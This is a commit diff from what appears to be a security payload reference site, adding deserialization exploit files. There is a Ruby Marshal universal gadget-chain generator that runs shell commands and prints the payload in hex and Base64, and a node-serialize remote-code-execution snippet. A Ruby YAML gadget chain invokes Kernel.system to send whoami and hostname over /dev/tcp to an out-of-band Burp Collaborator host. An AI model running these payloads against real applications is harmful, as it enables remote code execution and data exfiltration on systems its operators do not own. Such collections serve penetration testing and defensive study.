Deployed 55afcb1 with MkDocs version: 1.5.3

2025-10-29 16:57:02 +00:00 · 2024-03-30 12:22:06 +00:00
commit 76f281cc93
454 changed files with 788469 additions and 0 deletions
--- a/Deserialization/DotNET/index.html
+++ b/Deserialization/DotNET/index.html
--- a/Deserialization/Files/Ruby_universal_gadget_generate_verify.rb
+++ b/Deserialization/Files/Ruby_universal_gadget_generate_verify.rb
@@ -0,0 +1,66 @@
+#!/usr/bin/env ruby
+
+class Gem::StubSpecification
+  def initialize; end
+end
+
+
+stub_specification = Gem::StubSpecification.new
+stub_specification.instance_variable_set(:@loaded_from, "|id 1>&2")
+
+puts "STEP n"
+stub_specification.name rescue nil
+puts
+
+
+class Gem::Source::SpecificFile
+  def initialize; end
+end
+
+specific_file = Gem::Source::SpecificFile.new
+specific_file.instance_variable_set(:@spec, stub_specification)
+
+other_specific_file = Gem::Source::SpecificFile.new
+
+puts "STEP n-1"
+specific_file <=> other_specific_file rescue nil
+puts
+
+
+$dependency_list= Gem::DependencyList.new
+$dependency_list.instance_variable_set(:@specs, [specific_file, other_specific_file])
+
+puts "STEP n-2"
+$dependency_list.each{} rescue nil
+puts
+
+
+class Gem::Requirement
+  def marshal_dump
+    [$dependency_list]
+  end
+end
+
+payload = Marshal.dump(Gem::Requirement.new)
+
+puts "STEP n-3"
+Marshal.load(payload) rescue nil
+puts
+
+
+puts "VALIDATION (in fresh ruby process):"
+IO.popen("ruby -e 'Marshal.load(STDIN.read) rescue nil'", "r+") do |pipe|
+  pipe.print payload
+  pipe.close_write
+  puts pipe.gets
+  puts
+end
+
+puts "Payload (hex):"
+puts payload.unpack('H*')[0]
+puts
+
+
+require "base64"
+puts "Payload (Base64 encoded):"
+puts Base64.encode64(payload)
--- a/Deserialization/Files/node-serialize.js
+++ b/Deserialization/Files/node-serialize.js
@@ -0,0 +1,5 @@
+var y = {
+    rce : function(){require('child_process').exec('ls /', function(error,stdout, stderr) { console.log(stdout) });},
+}
+var serialize = require('node-serialize');
+console.log("Serialized: \n" + serialize.serialize(y));
--- a/Deserialization/Files/ruby-serialize.yaml
+++ b/Deserialization/Files/ruby-serialize.yaml
@@ -0,0 +1,19 @@
+---
+- !ruby/object:Gem::Installer
+    i: x
+- !ruby/object:Gem::SpecFetcher
+    i: y
+- !ruby/object:Gem::Requirement
+  requirements:
+    !ruby/object:Gem::Package::TarReader
+    io: &1 !ruby/object:Net::BufferedIO
+      io: &1 !ruby/object:Gem::Package::TarReader::Entry
+         read: 0
+         header: "abc"
+      debug_output: &1 !ruby/object:Net::WriteAdapter
+         socket: &1 !ruby/object:Gem::RequestSet
+             sets: !ruby/object:Net::WriteAdapter
+                 socket: !ruby/module 'Kernel'
+                 method_id: :system
+             git_set: "bash -c 'echo 1 > /dev/tcp/`whoami`.`hostname`.wkkib01k9lsnq9qm2pogo10tmksagz.burpcollaborator.net/443'"
+         method_id: :resolve
--- a/Deserialization/Images/NETNativeFormatters.png
+++ b/Deserialization/Images/NETNativeFormatters.png
--- a/Deserialization/Java/index.html
+++ b/Deserialization/Java/index.html
--- a/Deserialization/Node/index.html
+++ b/Deserialization/Node/index.html
--- a/Deserialization/PHP/index.html
+++ b/Deserialization/PHP/index.html
--- a/Deserialization/Python/index.html
+++ b/Deserialization/Python/index.html
--- a/Deserialization/Ruby/index.html
+++ b/Deserialization/Ruby/index.html
--- a/Deserialization/YAML/index.html
+++ b/Deserialization/YAML/index.html
--- a/Deserialization/index.html
+++ b/Deserialization/index.html